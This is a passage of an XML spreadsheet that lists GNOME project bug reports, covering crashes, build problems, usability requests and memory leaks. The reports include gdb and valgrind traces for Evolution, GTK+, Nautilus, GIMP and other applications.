On top of that the 3 on the '2003' for February is cut off as well.</t>
  </si>
  <si>
    <t>EVOLUTION-523402</t>
  </si>
  <si>
    <t>Crash on paste event in calendar</t>
  </si>
  <si>
    <t>I tried cut&amp;paste the even form one day to other and it crashed with double free with this trace:
Program received signal SIGABRT Aborted.
(gdb) bt
#0  0x00000031fda30ec5 in raise (sig=) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
#1  0x00000031fda32970 in abort () at abort.c:88
#2  0x00000031fda6b0db in __libc_message (do_abort=2 fmt=0x31fdb22f08 *** glibc detected *** %s: %s: 0x%s ***\n)
    at ../sysdeps/unix/sysv/linux/libc_fatal.c:170
#3  0x00000031fda72832 in _int_free (av=0x31fdd529b0 mem=) at malloc.c:5891
#4  0x00000031fda75f2c in __libc_free (mem=0x6) at malloc.c:3626
#5  0x00002aaaaf7d71e9 in IA__g_free (mem=0x8308d0) at gmem.c:190
#6  0x00002aaaac628a20 in e_cal_component_free_datetime (dt=0x7fffa10c2a00) at e-cal-component.c:4731
#7  0x00002aaab4da3593 in e_calendar_view_add_event (cal_view=0xabc9a0 client=0xb04240 dtstart=1205967600 default_zone=0x8eb570 
    icalcomp=0x69d070 in_top_canvas=1) at e-calendar-view.c:374
#8  0x00002aaab4da4d46 in clipboard_get_text_cb (clipboard=0xbab990 
    text=0xee4a00 BEGIN:VCALENDAR\nCALSCALE:GREGORIAN\nPRODID:-//Ximian//NONSGML Evolution Calendar//EN\nVERSION:2.0\nBEGIN:VTIMEZONE\nTZID:/softwarestudio.org/Tzfile/Europe/Prague\nX-LIC-LOCATION:Europe/Prague\nBEGIN:STANDAR... cal_view=0xabc9a0) at e-calendar-view.c:831
#9  0x00002aaaadfaf944 in request_text_received_func (clipboard=0xbab990 selection_data=0x7fffa10c3650 data=0x82a560)
    at gtkclipboard.c:940
#10 0x00002aaaadfaf731 in selection_received (widget=0xb98c00 selection_data=0x7fffa10c3650 time=3354392709) at gtkclipboard.c:852
#11 0x00002aaaade0dfe9 in _gtk_marshal_VOID__BOXED_UINT (closure=0xc2f050 return_value=0x0 n_param_values=3 
    param_values=0x7fffa10c32a0 invocation_hint=0x7fffa10c2ff0 marshal_data=0x0) at gtkmarshalers.c:1584
#12 0x00002aaaaf54fd08 in IA__g_closure_invoke (closure=0xc2f050 return_value=0x0 n_param_values=3 param_values=0x7fffa10c32a0 
    invocation_hint=0x7fffa10c2ff0) at gclosure.c:490
#13 0x00002aaaaf569309 in signal_emit_unlocked_R (node=0x74fcf0 detail=0 instance=0xb98c00 emission_return=0x0 
    instance_and_params=0x7fffa10c32a0) at gsignal.c:2440
#14 0x00002aaaaf567f7c in IA__g_signal_emit_valist (instance=0xb98c00 signal_id=82 detail=0 var_args=0x7fffa10c3540) at gsignal.c:2199
#15 0x00002aaaaf5687dc in IA__g_signal_emit_by_name (instance=0xb98c00 detailed_signal=0x2aaaae07b4ea selection_received)
    at gsignal.c:2267
#16 0x00002aaaade94087 in gtk_selection_retrieval_report (info=0x109aea0 type=0x48 format=8 
    buffer=0xe9e200 BEGIN:VCALENDAR\nCALSCALE:GREGORIAN\nPRODID:-//Ximian//NONSGML Evolution Calendar//EN\nVERSION:2.0\nBEGIN:VTIMEZONE\nTZID:/softwarestudio.org/Tzfile/Europe/Prague\nX-LIC-LOCATION:Europe/Prague\nBEGIN:STANDAR... length=962 time=3354392709)
    at gtkselection.c:2772
#17 0x00002aaaade9159d in IA__gtk_selection_convert (widget=0xb98c00 selection=0x45 target=0x48 time_=3354392709)
    at gtkselection.c:1083
#18 0x00002aaaadfaf87e in IA__gtk_clipboard_request_contents (clipboard=0xbab990 target=0x48 
    callback=0x2aaaadfaf880  user_data=0x82a560) at gtkclipboard.c:904
#19 0x00002aaaadfaf9ff in IA__gtk_clipboard_request_text (clipboard=0xbab990 callback=0x2aaab4da4b4f  
    user_data=0xabc9a0) at gtkclipboard.c:976
#20 0x00002aaab4da4eaa in e_calendar_view_paste_clipboard (cal_view=0xabc9a0) at e-calendar-view.c:861
#21 0x00002aaab4da6842 in on_paste (ep=0xe606c0 pitem=0x2aaab509b2a8 data=0xabc9a0) at e-calendar-view.c:1659
#22 0x00002aaaaba6026f in ep_activate (w=0xf03630 inode=0xb1c310) at e-popup.c:305
#23 0x00002aaaaf569f85 in IA__g_cclosure_marshal_VOID__VOID (closure=0xb06a00 return_value=0x0 n_param_values=1 
    param_values=0x7fffa10c3ec0 invocation_hint=0x7fffa10c3c10 marshal_data=0x0) at gmarshal.c:77
#24 0x00002aaaaf54fd08 in IA__g_closure_invoke (closure=0xb06a00 return_value=0x0 n_param_values=1 param_values=0x7fffa10c3ec0 
    invocation_hint=0x7fffa10c3c10) at gclosure.c:490
#25 0x00002aaaaf569309 in signal_emit_unlocked_R (node=0x834fa0 detail=0 instance=0xf03630 emission_return=0x0 
    instance_and_params=0x7fffa10c3ec0) at gsignal.c:2440
#26 0x00002aaaaf567f7c in IA__g_signal_emit_valist (instance=0xf03630 signal_id=178 detail=0 var_args=0x7fffa10c4130) at gsignal.c:2199
#27 0x00002aaaaf56854d in IA__g_signal_emit (instance=0xf03630 signal_id=178 detail=0) at gsignal.c:2243
#28 0x00002aaaadf958d7 in IA__gtk_widget_activate (widget=0xf03630) at gtkwidget.c:4707
#29 0x00002aaaade24999 in IA__gtk_menu_shell_activate_item (menu_shell=0xedf5e0 menu_item=0xf03630 force_deactivate=1)
    at gtkmenushell.c:1145
#30 0x00002aaaade23536 in gtk_menu_shell_button_release (widget=0xedf5e0 event=0xb7f2a0) at gtkmenushell.c:669
#31 0x00002aaaade16d5d in gtk_menu_button_release (widget=0xedf5e0 event=0xb7f2a0) at gtkmenu.c:2725
#32 0x00002aaaade0b845 in _gtk_marshal_BOOLEAN__BOXED (closure=0x745450 return_value=0x7fffa10c4760 n_param_values=2 
    param_values=0x7fffa10c4a40 invocation_hint=0x7fffa10c4790 marshal_data=0x2aaaade16bd7) at gtkmarshalers.c:84
#33 0x00002aaaaf550018 in g_type_class_meta_marshal (closure=0x745450 return_value=0x7fffa10c4760 n_param_values=2 
    param_values=0x7fffa10c4a40 invocation_hint=0x7fffa10c4790 marshal_data=0x160) at gclosure.c:567
#34 0x00002aaaaf54fd08 in IA__g_closure_invoke (closure=0x745450 return_value=0x7fffa10c4760 n_param_values=2 
    param_values=0x7fffa10c4a40 invocation_hint=0x7fffa10c4790) at gclosure.c:490
#35 0x00002aaaaf569591 in signal_emit_unlocked_R (node=0x7454c0 detail=0 instance=0xedf5e0 emission_return=0x7fffa10c4a20 
    instance_and_params=0x7fffa10c4a40) at gsignal.c:2478
#36 0x00002aaaaf568003 in IA__g_signal_emit_valist (instance=0xedf5e0 signal_id=61 detail=0 var_args=0x7fffa10c4cb0) at gsignal.c:2209
#37 0x00002aaaaf56854d in IA__g_signal_emit (instance=0xedf5e0 signal_id=61 detail=0) at gsignal.c:2243
#38 0x00002aaaadf957c3 in gtk_widget_event_internal (widget=0xedf5e0 event=0xb7f2a0) at gtkwidget.c:4676
#39 0x00002aaaadf952ef in IA__gtk_widget_event (widget=0xedf5e0 event=0xb7f2a0) at gtkwidget.c:4476
#40 0x00002aaaade09b11 in IA__gtk_propagate_event (widget=0xedf5e0 event=0xb7f2a0) at gtkmain.c:2336
#41 0x00002aaaade08607 in IA__gtk_main_do_event (event=0xb7f2a0) at gtkmain.c:1556
#42 0x00002aaaae384097 in gdk_event_dispatch (source=0x65e940 callback=0 user_data=0x0) at gdkevents-x11.c:2365
#43 0x00002aaaaf7cd7ef in g_main_dispatch (context=0x65e9c0) at gmain.c:2003
#44 0x00002aaaaf7cef7c in IA__g_main_context_dispatch (context=0x65e9c0) at gmain.c:2555
#45 0x00002aaaaf7cf5c1 in g_main_context_iterate (context=0x65e9c0 block=1 dispatch=1 self=0x6279b0) at gmain.c:2636
#46 0x00002aaaaf7cfdcb in IA__g_main_loop_run (loop=0x691c30) at gmain.c:2844
#47 0x00002aaaad5e8221 in bonobo_main () at bonobo-main.c:311
#48 0x000000000041a3cd in main (argc=1 argv=0x7fffa10c53b8) at main.c:782</t>
  </si>
  <si>
    <t>TOTEM-316286</t>
  </si>
  <si>
    <t>Resize the sidebar before showing it</t>
  </si>
  <si>
    <t>This bug has been opened here: http://bugzilla.ubuntu.com/show_bug.cgi?id=14323
I've been using totem and it's new playlist a lot.
However totem does not remember the size of that playlist as I set it
previously and will open with it at ~40% of the width of the window
I usually have totem fullscreen so this is an immense size for a playlist. It'd
make much more sense if it'd remember the with the user had given the playlist
previously.
failing that have it open at a sensible default size either in pixels or
percentage of total window width.
Reproduce:
open totem
drag the playlist window to something very small. 
close totem
open totem</t>
  </si>
  <si>
    <t>NAUTILUS-43036</t>
  </si>
  <si>
    <t>can't build Nautilus if Bonobo and ORBit are installed in separate prefixes</t>
  </si>
  <si>
    <t xml:space="preserve">Here's what Ariel Rios  had to say about the problem:
I was helped by jsergent and found that the PPC problem I was having  is
originated to some configure.in problems in evolution. For some reason nautilus is
not capable of locating the correct location of the IDL_CFLAGS if bonobo was
installed in a different prefix from ORBit.
Evolution solves this by 'manually' calling gnome-conf to get the
correct IDL_CFLAGS in each subdir makefile which seems to be suboptimal since it is 
better to have that done inside configure.in
------- Additional Comments From rslomkow@eazel.com 2000-09-13 17:48:06 ----
This is a potentiall tricky issue with gnome-config I would prefer to solve it
the correct way
------- Additional Comments From eli@eazel.com 2000-10-16 18:58:01 ----
Batch-assigning QA ownership of Build bugs to Josh Barrow.
------- Additional Comments From don@eazel.com 2000-12-15 09:31:24 ----
Batch move all 254 PR3 P5 bugs to 1.0.1.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:39 -------
The original owner (rslomkow@eazel.com) of this bug does not have an account here.
Reassigning to the default owner of the component nautilus-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>F-SPOT-525246</t>
  </si>
  <si>
    <t>Import dialog is confusingly empty by default</t>
  </si>
  <si>
    <t>F-Spot 0.4.2 Ubuntu Hardy beta
When F-Spot's Import dialog first opens it begins with an Import Source menu set to Select Folder but this is followed by two empty panes neither of which contain any folders to select.
(The behavior of the Import Source menu is also confusing in that Select Folder is selected by default and does not end in an ellipsis but when reselected it opens a dialog for further input.)
This bug would be fixed if there is no longer an Import window with panes that are all empty by default. This might be achieved by either:
*   abolishing the entire Import dialog replacing it with items for detected
    cameras in the Sidebar of F-Spot's main window with the remaining File &gt;
    Importâ€¦ item going directly to a filepicker
*   converting the Import Source menu into a new left pane in the Import
    dialog.</t>
  </si>
  <si>
    <t>EVOLUTION-210167</t>
  </si>
  <si>
    <t>hitting search button in mail folder causes crash</t>
  </si>
  <si>
    <t>I don't know what I did to make the search button so lethal but it is.
The funny part is that I can still do a search in my mail folder by
typing in the search pattern and hitting return. I can restore from the
search by erasing the pattern and hitting return. I just have to not use
the search button.
No core file left behind just a little dialog with a notice that the
mailer crashed. I was parked on a letter in the Inbox if this is a factor.</t>
  </si>
  <si>
    <t>GTK+-314382</t>
  </si>
  <si>
    <t>the fileselector should use gnome-dev-harddisk icon</t>
  </si>
  <si>
    <t>As stated by bug #314346 the GTK fileselector uses gnome-fs-blockdev it should
use gnome-dev-harddisk as the gnome-vfs mode.</t>
  </si>
  <si>
    <t>PAN-62142</t>
  </si>
  <si>
    <t>Pan crashes when updating display</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Pan
Severity: major
Version: 0.10.0.92
Synopsis: Pan crashes when updating display
Bugzilla-Product: Pan
Bugzilla-Component: general
Description:
Pan crashes when updating display.  In updating comp.os.linux.advocacy pan displays the order of the Message thread incorrectly.  When the Date column is clicked to put the message in date order pan crashes.
Debugging Information:
(no debugging symbols found)...
Program terminated with signal ? Unknown signal.
The program no longer exists.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-10-11 07:28 -------
The original reporter (persona@archangel.jcrcomputing.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component charles@rebelbase.com.
</t>
  </si>
  <si>
    <t>persona</t>
  </si>
  <si>
    <t>GALEON-95492</t>
  </si>
  <si>
    <t>It is not possible to import galeon 1 bookmarks.</t>
  </si>
  <si>
    <t>Hello
I have just looked a bit at galeon 2 from the debian galeon-snapshot
package (version 1.2.99.20020908-1). To be able to test it i tried to
import my older galeon 1 bookmarks and did not find any kind of menu entry
for it but there were entries for mozilla netscape and konqueror.
Well i suppose galeon2 is targeted at former windows users anyway but
even so i think it would be nice to have a bit more options in this import
issue. I find that i often have to import/export bookmarks from another
user and or  from another computer so it is very usefull to import/export
bookmarks from galeon 1 and galeon 2 format.
Especially since galeon 2 is already able to read galeon 1 bookmarks and
convert them (i just needed to move the bookmark file by hand between
.galeon and .galeon-snapshot) and was told that the galeon 2 and konqueror
bookmarks format was the same or so i was told on the galeon-user list.
Friendly
Sven Luther</t>
  </si>
  <si>
    <t>luther</t>
  </si>
  <si>
    <t>TOTEM-499460</t>
  </si>
  <si>
    <t>Add filechooser filter for more text subtitle types</t>
  </si>
  <si>
    <t>In totem-uri.c:
/* FIXME add missing *.sub *.smi and *.ssa */
Those need mime-types in shared-mime-info and a few lines in Totem itself.</t>
  </si>
  <si>
    <t>GNUCASH-514043</t>
  </si>
  <si>
    <t>Build system</t>
  </si>
  <si>
    <t>Widespread misuse of AM_CFLAGS</t>
  </si>
  <si>
    <t>AM_CFLAGS is passed both to the compiler (.c -&gt; .o) and to the linker so it should only have flags that are appropriate for both steps. AM_CPPFLAGS is passed only to the compiler so flags that are only appropriate for that step (-I and -D flags for example) should be in _CPPFLAGS instead of _CFLAGS. Every gnucash-2.2.3 Makefile.am that passes -I flags gets it wrong placing them in _CFLAGS. It's not a functional bug (the linker ignores -I flags) but a ton of superfluous flags makes the build output pretty verbose and hard to debug when things do go wrong.
To make matters more confusing as a developer the FOO_CFLAGS variable set by PKG_CHECK_MODULES(FOO) is actually for _CPPFLAGS in the Makefile.am ('pkg-config --cflags' returns the -I flags).
A related -I bug (one that *is* functionally broken) is that sometimes a local (build dir) -I flag is passed after a global (installed dependent library) one. If my system happens to have a header installed from some unrelated thing compiler will find *that* one instead of the expected one in the source directory. Should always pass all local -I before any global ones.
Let me know if you want a mega-patch for all this.</t>
  </si>
  <si>
    <t>EVOLUTION-273015</t>
  </si>
  <si>
    <t>groupwise threading workaround ...</t>
  </si>
  <si>
    <t>G/W is creating broken thread IDs that screw with evolution's threading
logic creating some very odd threads :-) We should work around this in Evo
(apparently)
From: 	Not Zed 
...
Looks like groupwise is generating bad message-id's.
Message-id's are supposed to be an address-spec (i.e. email address format)
inside .  And nothing more.
But groupwise is generating:
@novell.com&gt;
Which we dont parse very well.  I think we end up parsing it as multiple
entries: 20050224T084546Z_B90D00000003  novell com novell com
(splitting it into rfc822 atoms - that seems an odd algorithm choice to me
although there's probably a reason it does it) so you're going to get lots
of mis-matches.
Hopefully the groupwise guys can fix this (do you know where to file bugs
against it?) although I guess we can do some sort of work-around for it
could you file a bug and attach these two messages (strip the content if
you want).</t>
  </si>
  <si>
    <t>GIMP-150154</t>
  </si>
  <si>
    <t>GIMP aborts when a PDB call contains a negative stroke count</t>
  </si>
  <si>
    <t>In continuing my stress testing of the PDB interface of GIMP I found that
passing a negative value (ie. -1) for the number of strokes in the stroke array
will cause GIMP to generate the error message:
GLib-ERROR **: gmem.c:140: failed to allocate 4294967288 bytes
GIMP immediately exits after the error message is output on the console.
This problem occurs with the following PDB calls:
gimp-airbrush-default gimp-airbrush aborts gimp-clone-default gimp-clone
gimp-convolve-default gimp-convolve aborts gimp-dodgeburn-default
gimp-dodgeburn aborts gimp-eraser-default gimp-eraser gimp-dodgeburn
gimp-gradients-sample-custom gimp-paintbrush-default gimp-paintbrush
gimp-path-set-points gimp-path-set-points gimp-smudge-default gimp-smudge
The PDB calls should ensure the count value is sane (ie. &gt;= 0).</t>
  </si>
  <si>
    <t>NAUTILUS-83428</t>
  </si>
  <si>
    <t>Remove Start Here or otherwise fix it</t>
  </si>
  <si>
    <t>Users should not be editing menu and menu item properties in Nautilus 
particularly when the functionality is buried under an obscure-sounding 
menu item in an arbitrary menu.  This functionality should be presented 
where all other preferences are set on the desktop by the user i.e. in 
Applications &gt; Desktop Preferences from foobar.  Currently the way to edit 
for example paths for menu launchers via GUI is to right click on a menu 
launcher choose Properties and try editing that way.  This is 
acceptable for the short term.
Request to remove Start Here menu item and desktop preferences editing 
functionality from Nautilus (only Nautilus-specific prefs must be editable 
from Nautilus) and transfer functionality to a new menu item called Menus 
 in Applications &gt; Desktop Preferences (separate bug long-term goal).</t>
  </si>
  <si>
    <t>coleen.baik</t>
  </si>
  <si>
    <t>GIMP-125274</t>
  </si>
  <si>
    <t>Tips files not found</t>
  </si>
  <si>
    <t>On startup Gimp let one knows that it canÂ´t find the file gimp_tips.txt. 
This happens in the Portuguese version only because there is no such file 
as gimp_tips.pt. Creating a file like this. The problem is resolved. 
However the error message in first place should have been can't find file 
tips_gimp.pt and not only gimp_files.txt.</t>
  </si>
  <si>
    <t>rc</t>
  </si>
  <si>
    <t>GNOME-APPLETS-76801</t>
  </si>
  <si>
    <t>CD Applet usability/HIG-compliance suggestions</t>
  </si>
  <si>
    <t>- Not currently keynavigable once it has focus
- Applets should have Preferences not Properties on right-click menu
- Properties dialog: should be renamed CD Player Preferences and Device
Path label needs a mnemonic
- Seems like you can currently only middle-click on certain parts of the
applet to reposition it-- should be able to click anywhere</t>
  </si>
  <si>
    <t>GNOME-PANEL-455503</t>
  </si>
  <si>
    <t>crash in Panel: Right clicked Terminal i...</t>
  </si>
  <si>
    <t>Version: 2.18.0
What were you doing when the application crashed?
Right clicked Terminal in the System Tools menu and selected Add to Desktop Panel
Distribution: Fedora release 7 (Moonshine)
Gnome Release: 2.18.0 2007-03-23 (Red Hat Inc)
BugBuddy Version: 2.18.0
System: Linux 2.6.21-1.3194.fc7 #1 SMP Wed May 23 22:47:07 EDT 2007 x86_64
X Vendor: The X.Org Foundation
X Vendor Release: 10300000
Selinux: Enforcing
Accessibility: Disabled
GTK+ Theme: Clearlooks
Icon Theme: Fedora
Memory status: size: 293277696 vsize: 293277696 resident: 17461248 share: 11550720 rss: 17461248 rss_rlim: 18446744073709551615
CPU usage: start_time: 1184061961 rtime: 353 utime: 300 stime: 53 cutime:0 cstime: 4 timeout: 0 it_real_value: 0 frequency: 100
Backtrace was generated from '/usr/bin/gnome-panel'
(no debugging symbols found)
Using host libthread_db library /lib64/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread 46912678940192 (LWP 2810)]
(no debugging symbols found)
0x00002aaab07f0865 in waitpid () from /lib64/libpthread.so.0
#0  0x00002aaab07f0865 in waitpid () from /lib64/libpthread.so.0
#1  0x00002aaaaaf38c97 in g_cclosure_marshal_VOID__ENUM ()
   from /usr/lib64/libgnomeui-2.so.0
#2  
#3  0x00002aaaafc62bcb in g_path_is_absolute () from /lib64/libglib-2.0.so.0
#4  0x00002aaaafc2975b in g_filename_to_uri () from /lib64/libglib-2.0.so.0
#5  0x0000000000438e31 in ?? ()
#6  0x00002aaaaf9dbf19 in g_closure_invoke () from /lib64/libgobject-2.0.so.0
#7  0x00002aaaaf9eb788 in g_cclosure_marshal_VOID__ENUM ()
   from /lib64/libgobject-2.0.so.0
#8  0x00002aaaaf9ecbd4 in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
#9  0x00002aaaaf9ecda3 in g_signal_emit () from /lib64/libgobject-2.0.so.0
#10 0x00002aaaacde774a in g_cclosure_marshal_VOID__ENUM ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#11 0x0000000000951250 in ?? ()
#12 0x000000000084d8e0 in ?? ()
#13 0x0000000000953590 in ?? ()
#14 0x0000000000951250 in ?? ()
#15 0x00002aaaaccf2a20 in g_cclosure_marshal_VOID__ENUM ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#16 0x00002aaaacce576d in g_cclosure_marshal_VOID__ENUM ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#17 0x00002aaaaf9dbf19 in g_closure_invoke () from /lib64/libgobject-2.0.so.0
#18 0x00002aaaaf9ebd98 in g_cclosure_marshal_VOID__ENUM ()
   from /lib64/libgobject-2.0.so.0
#19 0x00002aaaaf9ec99d in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
#20 0x00002aaaaf9ecda3 in g_signal_emit () from /lib64/libgobject-2.0.so.0
#21 0x00002aaaacde3a7e in g_cclosure_marshal_VOID__ENUM ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#22 0x0000000000951250 in ?? ()
#23 0x0000000000000000 in ?? ()
Thread 1 (Thread 46912678940192 (LWP 2810)):
#0  0x00002aaab07f0865 in waitpid () from /lib64/libpthread.so.0
No symbol table info available.
#1  0x00002aaaaaf38c97 in g_cclosure_marshal_VOID__ENUM ()
   from /usr/lib64/libgnomeui-2.so.0
No symbol table info available.
#2  
No symbol table info available.
#3  0x00002aaaafc62bcb in g_path_is_absolute () from /lib64/libglib-2.0.so.0
No symbol table info available.
#4  0x00002aaaafc2975b in g_filename_to_uri () from /lib64/libglib-2.0.so.0
No symbol table info available.
#5  0x0000000000438e31 in ?? ()
No symbol table info available.
#6  0x00002aaaaf9dbf19 in g_closure_invoke () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#7  0x00002aaaaf9eb788 in g_cclosure_marshal_VOID__ENUM ()
   from /lib64/libgobject-2.0.so.0
No symbol table info available.
#8  0x00002aaaaf9ecbd4 in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
No symbol table info available.
#9  0x00002aaaaf9ecda3 in g_signal_emit () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#10 0x00002aaaacde774a in g_cclosure_marshal_VOID__ENUM ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#11 0x0000000000951250 in ?? ()
No symbol table info available.
#12 0x000000000084d8e0 in ?? ()
No symbol table info available.
#13 0x0000000000953590 in ?? ()
No symbol table info available.
#14 0x0000000000951250 in ?? ()
No symbol table info available.
#15 0x00002aaaaccf2a20 in g_cclosure_marshal_VOID__ENUM ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#16 0x00002aaaacce576d in g_cclosure_marshal_VOID__ENUM ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#17 0x00002aaaaf9dbf19 in g_closure_invoke () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#18 0x00002aaaaf9ebd98 in g_cclosure_marshal_VOID__ENUM ()
   from /lib64/libgobject-2.0.so.0
No symbol table info available.
#19 0x00002aaaaf9ec99d in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
No symbol table info available.
#20 0x00002aaaaf9ecda3 in g_signal_emit () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#21 0x00002aaaacde3a7e in g_cclosure_marshal_VOID__ENUM ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#22 0x0000000000951250 in ?? ()
No symbol table info available.
#23 0x0000000000000000 in ?? ()
No symbol table info available.
#0  0x00002aaab07f0865 in waitpid () from /lib64/libpthread.so.0
The program is running.  Quit anyway (and detach it)? (y or n) [answered Y input not from terminal]
----------- .xsession-errors ---------------------
warning: .dynamic section for /usr/lib64/libgtk-x11-2.0.so.0 is not at the expected address (wrong library or version mismatch?)
warning: .dynamic section for /usr/lib64/libxml2.so.2 is not at the expected address (wrong library or version mismatch?)
warning: .dynamic section for /usr/lib64/libgdk-x11-2.0.so.0 is not at the expected address (wrong library or version mismatch?)
warning: .dynamic section for /lib64/libdbus-1.so.3 is not at the expected address (wrong library or version mismatch?)
warning: .dynamic section for /usr/lib64/libfreetype.so.6 is not at the expected address (wrong library or version mismatch?)
warning: .dynamic section for /usr/lib64/libgssapi_krb5.so.2 is not at the expected address (wrong library or version mismatch?)
warning: .dynamic section for /usr/lib64/libkrb5.so.3 is not at the expected address (wrong library or version mismatch?)
warning: .dynamic section for /usr/lib64/libk5crypto.so.3 is not at the expected address (wrong library or version mismatch?)
--------------------------------------------------</t>
  </si>
  <si>
    <t>jason.kane</t>
  </si>
  <si>
    <t>DASHER-508435</t>
  </si>
  <si>
    <t>Compile failure due to local round() function</t>
  </si>
  <si>
    <t>A fink user has reported that while compiling dasher-4.6.1 on OS X 10.4 (gcc 4.0.1) the final linking of the dasher binary fails with:
/usr/libexec/gcc/powerpc-apple-darwin8/4.0.1/ld: multiple definitions of symbol _round
/usr/lib/gcc/powerpc-apple-darwin8/4.0.1/../../../libpthread.dylib (rndint.o) definition of _round
DasherCore/libdashercore.a(AutoSpeedControl.o) definition of _round in section (__TEXT__text)
On OS X libpthread is a symlink to libSystem (comparable to libc on linux) and round() is declared in math.h. There are several places in dasher where round() compatibility functions are provided (and based on different criteria each time) so maybe this whole mess could be solved everywhere in a more unified fashion. How about a configure test for it (AC_SEARCH_LIBS or AC_CHECK_FUNCS or somesuch) and then use the result of that test to decide whether to implement a compatibilility function?</t>
  </si>
  <si>
    <t>GTK+-113370</t>
  </si>
  <si>
    <t>Can't make a window vertically unresizable</t>
  </si>
  <si>
    <t>setting both max and min height to -1 in geometry hints yells a warning
about height being -1 and does not work as desired. Code with example 
attached.
Note that setting a window horizontally unresizable works perfectly though.</t>
  </si>
  <si>
    <t>NAUTILUS-111660</t>
  </si>
  <si>
    <t>Wrong path on the interface when copying files</t>
  </si>
  <si>
    <t>1) create a a symlink on the desktop of a folder(for me /mp3)
2) copy some files from a CD  on the symlink folder on the desktop
3) In the interface Copying files the field to display the path of the
symlink instead of the real path</t>
  </si>
  <si>
    <t>EPIPHANY-791168</t>
  </si>
  <si>
    <t>Add protection against IDN homograph attacks</t>
  </si>
  <si>
    <t>From https://bugs.webkit.org/show_bug.cgi?id=174816#c0:
If we add this property we would need to include a defense against IDN homograph attacks. Epiphany does not currently have such a defense. So some research on IDN homograph defenses will be needed. I like the Firefox approach better than Chrome's approach. (Chrome completely bans characters that look like Latin characters essentially banning Cyrillic URIs entirely. I'd rather have lower security than harm Cyrillic users like that.)</t>
  </si>
  <si>
    <t>gabrielivascu</t>
  </si>
  <si>
    <t>GNOME-CORE-55608</t>
  </si>
  <si>
    <t>Panel crashed</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  panel
Severity: normal
Version:  1.2.1
Synopsis: Panel crashed
Class:    sw-bug
Distribution: Red Hat Linux release 7.0 (Guinness)
System: Linux 2.2.16-22 i586 unknown
C library: glibc-2.1.92-14
C compiler: 2.96
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.4
libxml: 1.8.9
gnome-print: gnome-print-0.20-8
gnome-core: gnome-core 1.2.1
Description:
 Once logon to an userid account the following message appears:
 Application panel ( process 2760) has crashed due to a fatal error.
Debugging information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...0x40604c39 in __wait4 () from /lib/libc.so.6
#0  0x40604c39 in __wait4 () from /lib/libc.so.6
#1  0x4066e53c in __DTOR_END__ () from /lib/libc.so.6
#2  0x4016ab38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  
#4  0x80545d8 in gtk_type_check_object_cast ()
#5  0x8084ffb in border_pos_get_type ()
#6  0x8084386 in basep_widget_set_hidebuttons ()
#7  0x8083f1e in basep_widget_construct ()
#8  0x80856f7 in border_widget_construct ()
#9  0x8085b7c in edge_widget_new ()
#10 0x805d3a8 in init_user_panels ()
#11 0x8055a22 in main ()
#12 0x40571790 in __libc_start_main (main=0x8055790  argc=3 
    ubp_av=0xbffff9f4 init=0x8052f24  fini=0x8090f9c  
    rtld_fini=0x4000d35c  stack_end=0xbffff9ec)
    at ../sysdeps/generic/libc-start.c:111
#0  0x40604c39 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x4066e53c in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4016ab38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  
No locals.
#4  0x80545d8 in gtk_type_check_object_cast ()
No symbol table info available.
#5  0x8084ffb in border_pos_get_type ()
No symbol table info available.
#6  0x8084386 in basep_widget_set_hidebuttons ()
No symbol table info available.
#7  0x8083f1e in basep_widget_construct ()
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-06-02 02:43 -------
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>kellro</t>
  </si>
  <si>
    <t>GTK+-360350</t>
  </si>
  <si>
    <t>leak in gtk_radio_button_focus</t>
  </si>
  <si>
    <t>When using TAB to cycle trough the widgets the radio button leaks a GSList.
==8744== 32 (16 direct 16 indirect) bytes in 2 blocks are definitely lost in loss record 7078 of 8250
==8744==    at 0x0ffbba78: malloc (vg_replace_malloc.c:149)
==8744==    by 0x0f67dc4c: g_malloc (gmem.c:131)
==8744==    by 0x0f690fa4: g_slice_alloc (gslice.c:777)
==8744==    by 0x0f69200c: g_slist_copy (gslist.c:311)
==8744==    by 0x0fd77838: gtk_radio_button_focus (gtkradiobutton.c:452)
==8744==    by 0x0fd29e34: _gtk_marshal_BOOLEAN__ENUM (gtkmarshalers.c:163)
==8744==    by 0x0f75d528: g_type_class_meta_marshal (gclosure.c:567)
==8744==    by 0x0f75f414: g_closure_invoke (gclosure.c:490)
==8744==    by 0x0f775464: signal_emit_unlocked_R (gsignal.c:2478)
==8744==    by 0x0f7763c8: g_signal_emit_valist (gsignal.c:2209)
==8744==    by 0x0f776818: g_signal_emit (gsignal.c:2243)
